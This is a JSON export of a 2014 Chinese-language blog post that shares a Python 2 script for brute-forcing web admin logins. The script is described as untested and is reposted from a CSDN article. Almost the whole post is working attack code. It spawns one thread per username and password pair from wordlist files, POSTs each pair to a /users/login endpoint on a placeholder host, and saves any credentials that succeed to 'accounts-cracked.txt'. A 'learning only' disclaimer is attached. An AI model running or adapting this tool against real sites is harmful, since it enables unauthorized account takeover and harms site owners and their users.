{"id":230,"date":"2014-06-29T09:08:04","date_gmt":"2014-06-29T09:08:04","guid":{"rendered":"http:\/\/ixyzero.com\/blog\/?p=230"},"modified":"2014-06-29T09:08:04","modified_gmt":"2014-06-29T09:08:04","slug":"python%e5%86%99%e7%9a%84http%e5%90%8e%e5%8f%b0%e5%bc%b1%e5%8f%a3%e4%bb%a4%e7%88%86%e7%a0%b4%e5%b7%a5%e5%85%b7","status":"publish","type":"post","link":"https:\/\/ixyzero.com\/blog\/archives\/230.html","title":{"rendered":"Python\u5199\u7684http\u540e\u53f0\u5f31\u53e3\u4ee4\u7206\u7834\u5de5\u5177"},"content":{"rendered":"<h6 style=\"color: #000000;\">Python\u5199\u7684http\u540e\u53f0\u5f31\u53e3\u4ee4\u7206\u7834\u5de5\u5177{<span style=\"color: #ff0000;\"><strong>\u6682\u672a\u6d4b\u8bd5<\/strong><\/span>}<\/h6>\n<pre class=\"lang:default decode:true \"># -*- coding: utf-8 -*-\n'''\n\u5229\u7528python \u5199\u7684\u591a\u7ebf\u7a0b\u7206\u7834\u540e\u53f0\u7528\u6237\u540d+\u5bc6\u7801(\u81ea\u5907\u5b57\u5178),\u6bd4\u8f83\u5b9e\u7528,\u5373\u4f7f\u662f\u5728\u4fe1\u606f\u5b89\u5168\u8fd9\u4e48\u91cd\u89c6\u7684\u4eca\u5929,\u8fd8\u662f\u6709\u4eba\u4e0d\u52a0\u9a8c\u8bc1\u7801\u6216\u8005\u5f02\u5e38\u8bbf\u95ee\u9650\u5236\u4e4b\u7c7b\u7684\u767b\u9646\u9a8c\u8bc1\u65b9\u5f0f,\u8fd9\u6837\u5c31\u5f88\n\u5bb9\u6613\u88ab\u5f31\u53e3\u4ee4\u7206\u7834\u5de5\u5177\u62ff\u4e0b(\u672c\u4ee3\u7801\u4ec5\u9650\u5b66\u4e60\u5b9e\u7528,\u7981\u6b62\u8fdb\u884cweb\u653b\u51fb,\u4e0d\u627f\u62c5\u6cd5\u5f8b\u8d23\u4efb)\n'''\nimport urllib2\nimport urllib\nimport httplib\nimport threading\n\nheaders = {\"Content-Type\":\"application\/x-www-form-urlencoded\",\n           \"Connection\":\"Keep-Alive\",\n           \"Referer\":\"http:\/\/www.xxxxx.com\/\"};# referer:\u662f\u4ee3\u7406\u7684\u8bbf\u95ee\u6765\u6e90\u5730\u5740\n# lock = threading.Lock()\ndef tryUser(user,password):\n    #print user,password\n    global headers\n    global outFile\n    conn = httplib.HTTPConnection(\"www.xxxxx.com\") # \u8fdc\u7a0b\u57df\u540d\n    if len(user) &lt; 3:     # \u9650\u5236\u7528\u6237\u540d\u957f\u5ea6\uff0c\u6392\u9664\u5b57\u5178\u4e2d\u7684\u65e0\u7528\u6570\u636e\n        return  # \u4e3b\u52a8\u9000\u51fa\u7ebf\u7a0b\n    else:\n        #lock.acquire()   # \u591a\u7ebf\u7a0b\u64cd\u4f5c\u6587\u4ef6\uff0c\u63d0\u524d\u52a0\u9501\uff0c\u7528\u540e\u91ca\u653e\n        #line = inFile.readline()\n\n        #userData = line.strip().split(' # ') # strip() \u9ed8\u8ba4\u53bb\u9664\u7a7a\u767d\u5b57\u7b26\u5305\u62ec' ','t','n'\u7b49\n        #lock.release()\n\n        user = user.strip()\n        passwd = password.strip()\n        params = urllib.urlencode({'username': user, 'password': passwd})\n        conn.request(method=\"POST\", url=\"\/users\/login\", body=params, headers=headers) # \u540e\u53f0\u8def\u5f84\n        responseText = conn.getresponse().read().decode('utf8') # \u7f51\u9875\u7f16\u7801\n        #print responseText  # \u7b2c\u4e00\u6b21\u53ef\u4ee5\u6253\u5370\u770b\u770b\u662f\u5426\u89e3\u6790\n        if not responseText.find(u'\u7528\u6237\u540d\u6216\u8005\u5bc6\u7801\u4e0d\u6b63\u786e,\u8bf7\u91cd\u65b0\u8f93\u5165!') &gt; 0 :\n            print '----- find user:', user, 'with password:', passwd, '-----'\n            outFile.write(user + '    ' +  passwd + 'n')\n\n    return\n\noutFile = open('accounts-cracked.txt', 'w')\n\nif __name__ == '__main__':\n    tsk=[] # \u521b\u5efa\u7ebf\u7a0b\u6c60\n    with open(r'user.dic', 'r') as fUser:  # \u4f7f\u7528with as \u6765\u6253\u5f00\u6587\u4ef6,\u4e0d\u9700\u81ea\u5df1\u5173\u95ed\u6587\u4ef6,\u56e0\u4e3a\u4ed6\u4f1a\u81ea\u5df1\u5728\u5408\u9002\u7684\u65f6\u5019\u81ea\u5df2\u5173\u95ed(\u7c7b\u4f3cC# \u4e2d\u7684using(...){}\u63a5\u53e3)\n        with open(r'pass.dic', 'r') as fPass:\n            for user in fUser.readlines():\n                for password in fPass.readlines():\n                    t= threading.Thread(target = tryUser,args=(user,password))\n                    t.daemon = False # \u8bbe\u7f6e\u4e0d\u8fdb\u884c\u8fdb\u7a0b\u5b88\u62a4\n                    tsk.append(t) # t.start()\n                fPass.seek(0)\n                # \u8bb0\u4f4f\u8fd9\u91cc\u8981\u5c06\u6587\u4ef6\u91cd\u65b0\u79fb\u5230\u6587\u4ef6\u9996,\u4e0d\u7136\u5c31\u4f1a\u51fa\u73b0\u53ea\u6267\u884c\u5916\u5c42\u5faa\u73af\u7684\u7b2c\u4e00\u6761,\u56e0\u4e3a\u5185\u5c42\u5728\n                # \u8fed\u4ee3\u4e4b\u540e(readlines()\u662f\u8fed\u4ee3\u5668\u7684\u5f62\u5f0f,\u8fed\u4ee3\u4e00\u6b21\u540e\u6587\u4ef6\u6307\u9488\u5c31\u6307\u5230\u6587\u4ef6\u5c3e\u4e86,\u8fed\u4ee3\u5668\n                # \u4e5f\u662fend\u4e86)\u7b2c\u4e8c\u6b21\u5c31\u6ca1\u6709password \u5728 fPass\u4e2d,\u4e5f\u5c31\u662f\u8bf4 for  password in fPass.readlines():\n                # \u4e3a\u7a7a,\u6240\u4ee5\u8fd9\u91cc\u7684\u5185\u5c42\u5faa\u73af\u5c31\u4e0d\u4f1a\u88ab\u6267\u884c\u4e86,\u56e0\u6b64\u4e5f\u5c31\u662f\u8fed\u4ee3\u5668\u6e05\u96f6\u7684\u95ee\u9898(C ++ itertor \u5e38\u6709)\n\n# join()\u65e0\u53c2\u6570\u5c31\u662f\u5b8c\u5168\u963b\u585e\u4e3b\u7ebf\u7a0b,\u7b49\u5f85\u7ebf\u7a0b\u6267\u884c\u5b8c \u6709\u53c2\u6570\u5c31\u662f\u8bf4\uff0c\n# \u5728\u4e3b\u7ebf\u7a0b\u7b49\u5f85\u4e00\u79d2\u540e\u5c31\u4e0d\u963b\u585e\u7ebf\u7a0b\u4e86,\u7ee7\u7eed\u6267\u884c\u4e3b\u7ebf\u7a0b,\u8fd9\u91cc\u7684\u610f\u601d\u662f\u4e00\u79d2\u949f\u5f00\u4e00\u4e2a\u7ebf\u7a0b\n# \u4e0d\u80fd\u518dthread start\u4e4b\u524d\u8c03\u7528join(), \u56e0\u4e3ajoin() \u662f\u7ebf\u7a0b\u8fd0\u884c\u65f6\u8c03\u5ea6\n    for t in tsk:\n        t.start()\n        t.join(1)\n\n    print \"All thread OK, maybe not\"\n    outFile.close()<\/pre>\n<p>&nbsp;<\/p>\n<h6 style=\"color: #000000;\">\u539f\u6587\u5730\u5740\uff1a<\/h6>\n<div style=\"color: #000000;\"><a href=\"http:\/\/blog.csdn.net\/l_f0rm4t3d\/article\/details\/17287013\" target=\"_blank\">http:\/\/blog.csdn.net\/l_f0rm4t3d\/article\/details\/17287013<\/a><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Python\u5199\u7684http\u540e\u53f0\u5f31\u53e3\u4ee4\u7206\u7834\u5de5\u5177{\u6682\u672a\u6d4b\u8bd5} # -*- coding: utf-8 -*- &#8221;&#8217; [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,25,12],"tags":[108,8],"class_list":["post-230","post","type-post","status-publish","format-standard","hentry","category-programing","category-security","category-tools","tag-crack","tag-python"],"views":7885,"_links":{"self":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/230","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/comments?post=230"}],"version-history":[{"count":0,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/230\/revisions"}],"wp:attachment":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/media?parent=230"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/categories?post=230"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/tags?post=230"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}